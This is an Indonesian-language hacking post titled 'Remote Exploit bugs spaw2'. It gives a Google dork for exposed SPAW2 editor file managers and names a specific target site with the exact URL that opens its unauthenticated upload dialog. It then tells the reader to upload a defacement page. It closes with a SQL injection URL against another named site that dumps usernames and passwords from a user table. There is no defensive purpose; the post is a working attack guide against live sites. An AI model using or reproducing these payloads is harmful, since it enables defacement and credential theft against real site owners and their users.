You are on page 1of 1

Title : Remote Exploit bugs spaw2 Dork : spaw2/dialogs/ dan spaw2/uploads/files/ Prop of consept : http://www.google.co.id/search?q=+dork+%3A++spaw2%2Fdialogs%2F ++dan+spaw2%2Fuploads%2Ffiles%2F+&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla%3Aen-US %3Aofficial&client=firefox-a#sclient=psy-ab&hl=id&client=firefox-a&hs=Ll5&rls=or g.

mozilla:en-US%3Aofficial&source=hp&q=inurl:spaw2%2Fdialogs%2F&pbx=1&oq=inurl:s paw2%2Fdialogs%2F&aq=f&aqi=&aql=&gs_sm=3&gs_upl=6528l10199l1l10717l7l7l0l0l0l4l5 14l2995l3-3.3.1l7l0&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=dc3fbba42089339&biw=1443&bi h=552 Target : http://rohatools.com/classes/spaw2/ exploit : /spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang =es&charset&scid=cf73b58bb51c52235494da752d98cac9&type=files menjadi : http://rohatools.com/classes/spaw2/dialogs/dialog.php?module=spawfm&di alog=spawfm&theme=spaw2&lang=es&charset&scid=cf73b58bb51c52235494da752d98cac9&ty pe=files ingat!!! exploit ini patokannya spaw2/ jadi injeksiinya ke sana,nah nanti ada pilihan images dan files,nah u pilih files,trus upload deh file defaceann lu klo udah pilih ,download file hasilnya : http://rohatools.com/classes/spaw2/uploads/files/bugs.htm atau buat liat file defaceaanya http://target.com/classes/spaw2/uploads/files/namafileU.htm ini bisanya cuma file extension .txt , htm .html .....Sepeti itu gan ????? :) dork : spaw2/dialogs/ dan spaw2/uploads/files/ - Penelusuran Google www.google.co.id scripht : http://www.telematika.co.id/news.php?link=dtl&id=-26+union+select+1%2C 2%2C3%2C4%2Cgroup_concat%28user_name%2C0x3a%2Cpassword%29%2C6%2C7%2C8%2C9%2C10%2 C11%2C12%2C13%2C14%2Cgroup_concat%28user_name%2C0x3a%2Cpassword%29%2C16%2C17%2C1 8%2C19%2C20%2C21%2C22+from+pengguna

You might also like